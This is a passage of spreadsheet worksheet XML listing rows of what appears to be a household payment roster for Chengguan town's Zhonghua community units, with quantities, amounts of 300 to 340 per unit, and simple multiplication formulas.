      <c r="I920" s="14">
        <f t="shared" si="44"/>
        <v>340</v>
      </c>
      <c r="J920" s="24">
        <v>45108</v>
      </c>
      <c r="K920" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="921" ht="23" customHeight="1" spans="1:11">
      <c r="A921" s="13" t="s">
        <v>2459</v>
      </c>
      <c r="B921" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C921" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D921" s="14" t="s">
        <v>2460</v>
      </c>
      <c r="E921" s="14" t="s">
        <v>560</v>
      </c>
      <c r="F921" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G921" s="14">
        <v>1</v>
      </c>
      <c r="H921" s="14">
        <v>340</v>
      </c>
      <c r="I921" s="14">
        <f t="shared" si="44"/>
        <v>340</v>
      </c>
      <c r="J921" s="24">
        <v>45108</v>
      </c>
      <c r="K921" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="922" ht="23" customHeight="1" spans="1:11">
      <c r="A922" s="13" t="s">
        <v>2461</v>
      </c>
      <c r="B922" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C922" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D922" s="14" t="s">
        <v>2462</v>
      </c>
      <c r="E922" s="14" t="s">
        <v>2463</v>
      </c>
      <c r="F922" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G922" s="14">
        <v>1</v>
      </c>
      <c r="H922" s="14">
        <v>340</v>
      </c>
      <c r="I922" s="14">
        <f t="shared" si="44"/>
        <v>340</v>
      </c>
      <c r="J922" s="24">
        <v>45108</v>
      </c>
      <c r="K922" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="923" ht="23" customHeight="1" spans="1:11">
      <c r="A923" s="13" t="s">
        <v>2464</v>
      </c>
      <c r="B923" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C923" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D923" s="14" t="s">
        <v>2465</v>
      </c>
      <c r="E923" s="14" t="s">
        <v>2466</v>
      </c>
      <c r="F923" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G923" s="14">
        <v>2</v>
      </c>
      <c r="H923" s="14">
        <v>300</v>
      </c>
      <c r="I923" s="14">
        <f t="shared" si="44"/>
        <v>600</v>
      </c>
      <c r="J923" s="24">
        <v>45108</v>
      </c>
      <c r="K923" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="924" ht="23" customHeight="1" spans="1:11">
      <c r="A924" s="13" t="s">
        <v>2467</v>
      </c>
      <c r="B924" s="14" t="str">
        <f>B923</f>
        <v>城关镇</v>
      </c>
      <c r="C924" s="14" t="str">
        <f>C923</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D924" s="18" t="s">
        <v>2468</v>
      </c>
      <c r="E924" s="18" t="s">
        <v>2469</v>
      </c>
      <c r="F924" s="14" t="str">
        <f>F923</f>
        <v>4113210108</v>
      </c>
      <c r="G924" s="14"/>
      <c r="H924" s="14"/>
      <c r="I924" s="14"/>
      <c r="J924" s="24"/>
      <c r="K924" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="925" ht="23" customHeight="1" spans="1:11">
      <c r="A925" s="13" t="s">
        <v>2470</v>
      </c>
      <c r="B925" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C925" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D925" s="14" t="s">
        <v>2471</v>
      </c>
      <c r="E925" s="14" t="s">
        <v>2472</v>
      </c>
      <c r="F925" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G925" s="14">
        <v>1</v>
      </c>
      <c r="H925" s="14">
        <v>340</v>
      </c>
      <c r="I925" s="14">
        <f>H925*G925</f>
        <v>340</v>
      </c>
      <c r="J925" s="24">
        <v>45108</v>
      </c>
      <c r="K925" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="926" ht="23" customHeight="1" spans="1:11">
      <c r="A926" s="13" t="s">
        <v>2473</v>
      </c>
      <c r="B926" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C926" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D926" s="14" t="s">
        <v>2474</v>
      </c>
      <c r="E926" s="14" t="s">
        <v>599</v>
      </c>
      <c r="F926" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G926" s="14">
        <v>2</v>
      </c>
      <c r="H926" s="14">
        <v>300</v>
      </c>
      <c r="I926" s="14">
        <f>H926*G926</f>
        <v>600</v>
      </c>
      <c r="J926" s="24">
        <v>45108</v>
      </c>
      <c r="K926" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="927" ht="23" customHeight="1" spans="1:11">
      <c r="A927" s="13" t="s">
        <v>2475</v>
      </c>
      <c r="B927" s="14" t="str">
        <f>B926</f>
        <v>城关镇</v>
      </c>
      <c r="C927" s="14" t="str">
        <f>C926</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D927" s="18" t="s">
        <v>2476</v>
      </c>
      <c r="E927" s="19" t="s">
        <v>479</v>
      </c>
      <c r="F927" s="14" t="str">
        <f>F926</f>
        <v>4113210108</v>
      </c>
      <c r="G927" s="14"/>
      <c r="H927" s="14"/>
      <c r="I927" s="14"/>
      <c r="J927" s="24"/>
      <c r="K927" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="928" ht="23" customHeight="1" spans="1:11">
      <c r="A928" s="13" t="s">
        <v>2477</v>
      </c>
      <c r="B928" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C928" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D928" s="14" t="s">
        <v>2478</v>
      </c>
      <c r="E928" s="14" t="s">
        <v>672</v>
      </c>
      <c r="F928" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G928" s="14">
        <v>1</v>
      </c>
      <c r="H928" s="14">
        <v>340</v>
      </c>
      <c r="I928" s="14">
        <f>H928*G928</f>
        <v>340</v>
      </c>
      <c r="J928" s="24">
        <v>45108</v>
      </c>
      <c r="K928" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="929" ht="23" customHeight="1" spans="1:11">
      <c r="A929" s="13" t="s">
        <v>2479</v>
      </c>
      <c r="B929" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C929" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D929" s="14" t="s">
        <v>2480</v>
      </c>
      <c r="E929" s="14" t="s">
        <v>334</v>
      </c>
      <c r="F929" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G929" s="14">
        <v>1</v>
      </c>
      <c r="H929" s="14">
        <v>340</v>
      </c>
      <c r="I929" s="14">
        <f>H929*G929</f>
        <v>340</v>
      </c>
      <c r="J929" s="24">
        <v>45108</v>
      </c>
      <c r="K929" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="930" ht="23" customHeight="1" spans="1:11">
      <c r="A930" s="13" t="s">
        <v>2481</v>
      </c>
      <c r="B930" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C930" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D930" s="14" t="s">
        <v>2482</v>
      </c>
      <c r="E930" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F930" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G930" s="14">
        <v>2</v>
      </c>
      <c r="H930" s="14">
        <v>300</v>
      </c>
      <c r="I930" s="14">
        <f>H930*G930</f>
        <v>600</v>
      </c>
      <c r="J930" s="24">
        <v>45108</v>
      </c>
      <c r="K930" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="931" ht="23" customHeight="1" spans="1:11">
      <c r="A931" s="13" t="s">
        <v>2483</v>
      </c>
      <c r="B931" s="14" t="str">
        <f>B930</f>
        <v>城关镇</v>
      </c>
      <c r="C931" s="14" t="str">
        <f>C930</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D931" s="19" t="s">
        <v>2484</v>
      </c>
      <c r="E931" s="19" t="s">
        <v>2485</v>
      </c>
      <c r="F931" s="14" t="str">
        <f>F930</f>
        <v>4113210108</v>
      </c>
      <c r="G931" s="14"/>
      <c r="H931" s="14"/>
      <c r="I931" s="14"/>
      <c r="J931" s="24"/>
      <c r="K931" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="932" ht="23" customHeight="1" spans="1:11">
      <c r="A932" s="13" t="s">
        <v>2486</v>
      </c>
      <c r="B932" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C932" s="14" t="s">
        <v>2487</v>
      </c>
      <c r="D932" s="14" t="s">
        <v>2488</v>
      </c>
      <c r="E932" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F932" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G932" s="14">
        <v>1</v>
      </c>
      <c r="H932" s="14">
        <v>340</v>
      </c>
      <c r="I932" s="14">
        <f>H932*G932</f>
        <v>340</v>
      </c>
      <c r="J932" s="24">
        <v>45108</v>
      </c>
      <c r="K932" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="933" ht="23" customHeight="1" spans="1:11">
      <c r="A933" s="13" t="s">
        <v>2489</v>
      </c>
      <c r="B933" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C933" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D933" s="14" t="s">
        <v>2490</v>
      </c>
      <c r="E933" s="14" t="s">
        <v>373</v>
      </c>
      <c r="F933" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G933" s="14">
        <v>1</v>
      </c>
      <c r="H933" s="14">
        <v>340</v>
      </c>
      <c r="I933" s="14">
        <f>H933*G933</f>
        <v>340</v>
      </c>
      <c r="J933" s="24">
        <v>45108</v>
      </c>
      <c r="K933" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="934" ht="23" customHeight="1" spans="1:11">
      <c r="A934" s="13" t="s">
        <v>2491</v>
      </c>
      <c r="B934" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C934" s="14" t="s">
        <v>2492</v>
      </c>
      <c r="D934" s="14" t="s">
        <v>2493</v>
      </c>
      <c r="E934" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F934" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G934" s="14">
        <v>2</v>
      </c>
      <c r="H934" s="14">
        <v>300</v>
      </c>
      <c r="I934" s="14">
        <f>H934*G934</f>
        <v>600</v>
      </c>
      <c r="J934" s="24">
        <v>45108</v>
      </c>
      <c r="K934" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="935" ht="23" customHeight="1" spans="1:11">
      <c r="A935" s="13" t="s">
        <v>2494</v>
      </c>
      <c r="B935" s="14" t="str">
        <f>B934</f>
        <v>城关镇</v>
      </c>
      <c r="C935" s="14" t="str">
        <f>C934</f>
        <v>中华社区交通局</v>
      </c>
      <c r="D935" s="13" t="s">
        <v>2495</v>
      </c>
      <c r="E935" s="14" t="s">
        <v>1902</v>
      </c>
      <c r="F935" s="14" t="str">
        <f>F934</f>
        <v>4113210108</v>
      </c>
      <c r="G935" s="14"/>
      <c r="H935" s="14"/>
      <c r="I935" s="14"/>
      <c r="J935" s="24"/>
      <c r="K935" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="936" ht="23" customHeight="1" spans="1:11">
      <c r="A936" s="13" t="s">
        <v>2496</v>
      </c>
      <c r="B936" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C936" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D936" s="14" t="s">
        <v>2497</v>
      </c>
      <c r="E936" s="14" t="s">
        <v>1053</v>
      </c>
      <c r="F936" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G936" s="14">
        <v>1</v>
      </c>
      <c r="H936" s="14">
        <v>340</v>
      </c>
      <c r="I936" s="14">
        <f>H936*G936</f>
        <v>340</v>
      </c>
      <c r="J936" s="24">
        <v>45108</v>
      </c>
      <c r="K936" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="937" ht="23" customHeight="1" spans="1:11">
      <c r="A937" s="13" t="s">
        <v>2498</v>
      </c>
      <c r="B937" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C937" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D937" s="14" t="s">
        <v>2499</v>
      </c>
      <c r="E937" s="14" t="s">
        <v>2500</v>
      </c>
      <c r="F937" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G937" s="14">
        <v>1</v>
      </c>
      <c r="H937" s="14">
        <v>340</v>
      </c>
      <c r="I937" s="14">
        <f>H937*G937</f>
        <v>340</v>
      </c>
      <c r="J937" s="24">
        <v>45108</v>
      </c>
      <c r="K937" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="938" ht="23" customHeight="1" spans="1:11">
      <c r="A938" s="13" t="s">
        <v>2501</v>
      </c>
      <c r="B938" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C938" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D938" s="14" t="s">
        <v>2502</v>
      </c>
      <c r="E938" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F938" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G938" s="14">
        <v>2</v>
      </c>
      <c r="H938" s="14">
        <v>300</v>
      </c>
      <c r="I938" s="14">
        <f>H938*G938</f>
        <v>600</v>
      </c>
      <c r="J938" s="24">
        <v>45108</v>
      </c>
      <c r="K938" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="939" ht="23" customHeight="1" spans="1:11">
      <c r="A939" s="13" t="s">
        <v>2503</v>
      </c>
      <c r="B939" s="14" t="str">
        <f>B938</f>
        <v>城关镇</v>
      </c>
      <c r="C939" s="14" t="str">
        <f>C938</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D939" s="13" t="s">
        <v>2504</v>
      </c>
      <c r="E939" s="13" t="s">
        <v>292</v>
      </c>
      <c r="F939" s="14" t="str">
        <f>F938</f>
        <v>4113210108</v>
      </c>
      <c r="G939" s="14"/>
      <c r="H939" s="14"/>
      <c r="I939" s="14"/>
      <c r="J939" s="24"/>
      <c r="K939" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="940" ht="23" customHeight="1" spans="1:11">
      <c r="A940" s="13" t="s">
        <v>2505</v>
      </c>
      <c r="B940" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C940" s="14" t="s">
        <v>2388</v>
      </c>
      <c r="D940" s="14" t="s">
        <v>2506</v>
      </c>
      <c r="E940" s="14" t="s">
        <v>767</v>
      </c>
      <c r="F940" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G940" s="14">
        <v>1</v>
      </c>
      <c r="H940" s="14">
        <v>340</v>
      </c>
      <c r="I940" s="14">
        <f>H940*G940</f>
        <v>340</v>
      </c>
      <c r="J940" s="24">
        <v>45108</v>
      </c>
      <c r="K940" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="941" ht="23" customHeight="1" spans="1:11">
      <c r="A941" s="13" t="s">
        <v>2507</v>
      </c>
      <c r="B941" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C941" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D941" s="14" t="s">
        <v>2508</v>
      </c>
      <c r="E941" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F941" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G941" s="14">
        <v>1</v>
      </c>
      <c r="H941" s="14">
        <v>340</v>
      </c>
      <c r="I941" s="14">
        <f>H941*G941</f>
        <v>340</v>
      </c>
      <c r="J941" s="24">
        <v>45108</v>
      </c>
      <c r="K941" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="942" ht="23" customHeight="1" spans="1:11">
      <c r="A942" s="13" t="s">
        <v>2509</v>
      </c>
      <c r="B942" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C942" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D942" s="14" t="s">
        <v>2510</v>
      </c>
      <c r="E942" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F942" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G942" s="14">
        <v>2</v>
      </c>
      <c r="H942" s="14">
        <v>300</v>
      </c>
      <c r="I942" s="14">
        <f>H942*G942</f>
        <v>600</v>
      </c>
      <c r="J942" s="24">
        <v>45108</v>
      </c>
      <c r="K942" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="943" ht="23" customHeight="1" spans="1:11">
      <c r="A943" s="13" t="s">
        <v>2511</v>
      </c>
      <c r="B943" s="14" t="str">
        <f>B942</f>
        <v>城关镇</v>
      </c>
      <c r="C943" s="14" t="str">
        <f>C942</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D943" s="18" t="s">
        <v>2512</v>
      </c>
      <c r="E943" s="19" t="s">
        <v>975</v>
      </c>
      <c r="F943" s="14" t="str">
        <f>F942</f>
        <v>4113210108</v>
      </c>
      <c r="G943" s="14"/>
      <c r="H943" s="14"/>
      <c r="I943" s="14"/>
      <c r="J943" s="24"/>
      <c r="K943" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="944" ht="23" customHeight="1" spans="1:11">
      <c r="A944" s="13" t="s">
        <v>2513</v>
      </c>
      <c r="B944" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C944" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D944" s="14" t="s">
        <v>2514</v>
      </c>
      <c r="E944" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F944" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G944" s="14">
        <v>3</v>
      </c>
      <c r="H944" s="14">
        <v>265</v>
      </c>
      <c r="I944" s="14">
        <f>H944*G944</f>
        <v>795</v>
      </c>
      <c r="J944" s="24">
        <v>45108</v>
      </c>
      <c r="K944" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="945" ht="23" customHeight="1" spans="1:11">
      <c r="A945" s="13" t="s">
        <v>2515</v>
      </c>
      <c r="B945" s="14" t="str">
        <f>B944</f>
        <v>城关镇</v>
      </c>
      <c r="C945" s="14" t="str">
        <f>C944</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D945" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="E945" s="13" t="s">
        <v>551</v>
      </c>
      <c r="F945" s="14" t="str">
        <f>F944</f>
        <v>4113210108</v>
      </c>
      <c r="G945" s="14"/>
      <c r="H945" s="14"/>
      <c r="I945" s="14"/>
      <c r="J945" s="24"/>
      <c r="K945" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="946" ht="23" customHeight="1" spans="1:11">
      <c r="A946" s="13" t="s">
        <v>2517</v>
      </c>
      <c r="B946" s="14" t="str">
        <f>B945</f>
        <v>城关镇</v>
      </c>
      <c r="C946" s="14" t="str">
        <f>C945</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D946" s="13" t="s">
        <v>2518</v>
      </c>
      <c r="E946" s="13" t="s">
        <v>2519</v>
      </c>
      <c r="F946" s="14" t="str">
        <f>F945</f>
        <v>4113210108</v>
      </c>
      <c r="G946" s="14"/>
      <c r="H946" s="14"/>
      <c r="I946" s="14"/>
      <c r="J946" s="24"/>
      <c r="K946" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="947" ht="23" customHeight="1" spans="1:11">
      <c r="A947" s="13" t="s">
        <v>2520</v>
      </c>
      <c r="B947" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C947" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D947" s="14" t="s">
        <v>2521</v>
      </c>
      <c r="E947" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F947" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G947" s="14">
        <v>1</v>
      </c>
      <c r="H947" s="14">
        <v>340</v>
      </c>
      <c r="I947" s="14">
        <f>H947*G947</f>
        <v>340</v>
      </c>
      <c r="J947" s="24">
        <v>45108</v>
      </c>
      <c r="K947" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="948" ht="23" customHeight="1" spans="1:11">
      <c r="A948" s="13" t="s">
        <v>2522</v>
      </c>
      <c r="B948" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C948" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D948" s="14" t="s">
        <v>2523</v>
      </c>
      <c r="E948" s="14" t="s">
        <v>975</v>
      </c>
      <c r="F948" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G948" s="14">
        <v>1</v>
      </c>
      <c r="H948" s="14">
        <v>340</v>
      </c>
      <c r="I948" s="14">
        <f>H948*G948</f>
        <v>340</v>
      </c>
      <c r="J948" s="24">
        <v>45108</v>
      </c>
      <c r="K948" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="949" ht="23" customHeight="1" spans="1:11">
      <c r="A949" s="13" t="s">
        <v>2524</v>
      </c>
      <c r="B949" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C949" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D949" s="14" t="s">
        <v>2525</v>
      </c>
      <c r="E949" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F949" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G949" s="14">
        <v>1</v>
      </c>
      <c r="H949" s="14">
        <v>340</v>
      </c>
      <c r="I949" s="14">
        <f>H949*G949</f>
        <v>340</v>
      </c>
      <c r="J949" s="24">
        <v>45108</v>
      </c>
      <c r="K949" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="950" ht="23" customHeight="1" spans="1:11">
      <c r="A950" s="13" t="s">
        <v>2526</v>
      </c>
      <c r="B950" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C950" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D950" s="14" t="s">
        <v>2527</v>
      </c>
      <c r="E950" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F950" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G950" s="14">
        <v>2</v>
      </c>
      <c r="H950" s="14">
        <v>300</v>
      </c>
      <c r="I950" s="14">
        <f>H950*G950</f>
        <v>600</v>
      </c>
      <c r="J950" s="24">
        <v>45108</v>
      </c>
      <c r="K950" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="951" ht="23" customHeight="1" spans="1:11">
      <c r="A951" s="13" t="s">
        <v>2528</v>
      </c>
      <c r="B951" s="14" t="str">
        <f>B950</f>
        <v>城关镇</v>
      </c>
      <c r="C951" s="14" t="str">
        <f>C950</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D951" s="13" t="s">
        <v>2529</v>
      </c>
      <c r="E951" s="13" t="s">
        <v>2530</v>
      </c>
      <c r="F951" s="14" t="str">
        <f>F950</f>
        <v>4113210108</v>
      </c>
      <c r="G951" s="14"/>
      <c r="H951" s="14"/>
      <c r="I951" s="14"/>
      <c r="J951" s="24"/>
      <c r="K951" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="952" ht="23" customHeight="1" spans="1:11">
      <c r="A952" s="13" t="s">
        <v>2531</v>
      </c>
      <c r="B952" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C952" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D952" s="14" t="s">
        <v>2532</v>
      </c>
      <c r="E952" s="14" t="s">
        <v>2533</v>
      </c>
      <c r="F952" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G952" s="14">
        <v>1</v>
      </c>
      <c r="H952" s="14">
        <v>340</v>
      </c>
      <c r="I952" s="14">
        <f t="shared" ref="I952:I962" si="45">H952*G952</f>
        <v>340</v>
      </c>
      <c r="J952" s="24">
        <v>45108</v>
      </c>
      <c r="K952" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="953" ht="23" customHeight="1" spans="1:11">
      <c r="A953" s="13" t="s">
        <v>2534</v>
      </c>
      <c r="B953" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C953" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D953" s="14" t="s">
        <v>2535</v>
      </c>
      <c r="E953" s="14" t="s">
        <v>1653</v>
      </c>
      <c r="F953" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G953" s="14">
        <v>1</v>
      </c>
      <c r="H953" s="14">
        <v>340</v>
      </c>
      <c r="I953" s="14">
        <f t="shared" si="45"/>
        <v>340</v>
      </c>
      <c r="J953" s="24">
        <v>45108</v>
      </c>
      <c r="K953" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="954" ht="23" customHeight="1" spans="1:11">
      <c r="A954" s="13" t="s">
        <v>2536</v>
      </c>
      <c r="B954" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C954" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D954" s="14" t="s">
        <v>2537</v>
      </c>
      <c r="E954" s="14" t="s">
        <v>2538</v>
      </c>
      <c r="F954" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G954" s="14">
        <v>1</v>
      </c>
      <c r="H954" s="14">
        <v>340</v>
      </c>
      <c r="I954" s="14">
        <f t="shared" si="45"/>
        <v>340</v>
      </c>
      <c r="J954" s="24">
        <v>45108</v>
      </c>
      <c r="K954" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="955" ht="23" customHeight="1" spans="1:11">
      <c r="A955" s="13" t="s">
        <v>2539</v>
      </c>
      <c r="B955" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C955" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D955" s="14" t="s">
        <v>2540</v>
      </c>
      <c r="E955" s="14" t="s">
        <v>2541</v>
      </c>
      <c r="F955" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G955" s="14">
        <v>1</v>
      </c>
      <c r="H955" s="14">
        <v>340</v>
      </c>
      <c r="I955" s="14">
        <f t="shared" si="45"/>
        <v>340</v>
      </c>
      <c r="J955" s="24">
        <v>45108</v>
      </c>
      <c r="K955" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="956" ht="23" customHeight="1" spans="1:11">
      <c r="A956" s="13" t="s">
        <v>2542</v>
      </c>
      <c r="B956" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C956" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D956" s="14" t="s">
        <v>2543</v>
      </c>
      <c r="E956" s="14" t="s">
        <v>679</v>
      </c>
      <c r="F956" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G956" s="14">
        <v>1</v>
      </c>
      <c r="H956" s="14">
        <v>340</v>
      </c>
      <c r="I956" s="14">
        <f t="shared" si="45"/>
        <v>340</v>
      </c>
      <c r="J956" s="24">
        <v>45108</v>
      </c>
      <c r="K956" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="957" ht="23" customHeight="1" spans="1:11">
      <c r="A957" s="13" t="s">
        <v>2544</v>
      </c>
      <c r="B957" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C957" s="14" t="s">
        <v>2451</v>
      </c>
      <c r="D957" s="14" t="s">
        <v>2545</v>
      </c>
      <c r="E957" s="14" t="s">
        <v>2546</v>
      </c>
      <c r="F957" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G957" s="14">
        <v>1</v>
      </c>
      <c r="H957" s="14">
        <v>340</v>
      </c>
      <c r="I957" s="14">
        <f t="shared" si="45"/>
        <v>340</v>
      </c>
      <c r="J957" s="24">
        <v>45108</v>
      </c>
      <c r="K957" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="958" ht="23" customHeight="1" spans="1:11">
      <c r="A958" s="13" t="s">
        <v>2547</v>
      </c>
      <c r="B958" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C958" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D958" s="14" t="s">
        <v>2548</v>
      </c>
      <c r="E958" s="14" t="s">
        <v>883</v>
      </c>
      <c r="F958" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G958" s="14">
        <v>1</v>
      </c>
      <c r="H958" s="14">
        <v>340</v>
      </c>
      <c r="I958" s="14">
        <f t="shared" si="45"/>
        <v>340</v>
      </c>
      <c r="J958" s="24">
        <v>45108</v>
      </c>
      <c r="K958" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="959" ht="23" customHeight="1" spans="1:11">
      <c r="A959" s="13" t="s">
        <v>2549</v>
      </c>
      <c r="B959" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C959" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D959" s="14" t="s">
        <v>2550</v>
      </c>
      <c r="E959" s="14" t="s">
        <v>2302</v>
      </c>
      <c r="F959" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G959" s="14">
        <v>1</v>
      </c>
      <c r="H959" s="14">
        <v>340</v>
      </c>
      <c r="I959" s="14">
        <f t="shared" si="45"/>
        <v>340</v>
      </c>
      <c r="J959" s="24">
        <v>45108</v>
      </c>
      <c r="K959" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="960" ht="23" customHeight="1" spans="1:11">
      <c r="A960" s="13" t="s">
        <v>2551</v>
      </c>
      <c r="B960" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C960" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D960" s="14" t="s">
        <v>2552</v>
      </c>
      <c r="E960" s="14" t="s">
        <v>373</v>
      </c>
      <c r="F960" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G960" s="14">
        <v>1</v>
      </c>
      <c r="H960" s="14">
        <v>340</v>
      </c>
      <c r="I960" s="14">
        <f t="shared" si="45"/>
        <v>340</v>
      </c>
      <c r="J960" s="24">
        <v>45108</v>
      </c>
      <c r="K960" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="961" ht="23" customHeight="1" spans="1:11">
      <c r="A961" s="13" t="s">
        <v>2553</v>
      </c>
